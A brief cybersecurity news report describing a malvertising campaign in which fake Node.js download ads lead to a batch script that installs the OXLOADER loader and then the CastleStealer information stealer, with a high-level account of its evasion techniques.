Cybersecurity researchers have uncovered a new malware campaign that uses fraudulent Google advertisements to distribute a previously undocumented loader known as OXLOADER, which ultimately delivers the CastleStealer information-stealing malware. The operation begins when users search for software such as Node.js and are redirected through malicious ads to convincing lookalike websites designed to trick them into downloading infected files.
Victims who interact with the fake sites receive a malicious batch script hosted on the decentralized cloud storage platform Storj. While presenting a legitimate-looking installation wizard, the script quietly downloads and executes OXLOADER, which then uses DLL side-loading and multiple layers of obfuscation to evade detection and launch the final CastleStealer payload.
Researchers found that OXLOADER incorporates advanced anti-analysis features, including self-modifying code, anti-virtual machine checks, and complex code obfuscation techniques that make it difficult for security tools to identify. The malware also avoids infecting systems located in Commonwealth of Independent States (CIS) countries, a tactic commonly associated with financially motivated Russian-speaking cybercriminals.
Although still in its early stages, OXLOADER demonstrates a level of sophistication that has caught researchers’ attention. Its low detection rates, use of trusted cloud services, and carefully engineered evasion mechanisms give threat actors a valuable window to steal credentials, browser data, cryptocurrency wallets, and other sensitive information before security products can respond.
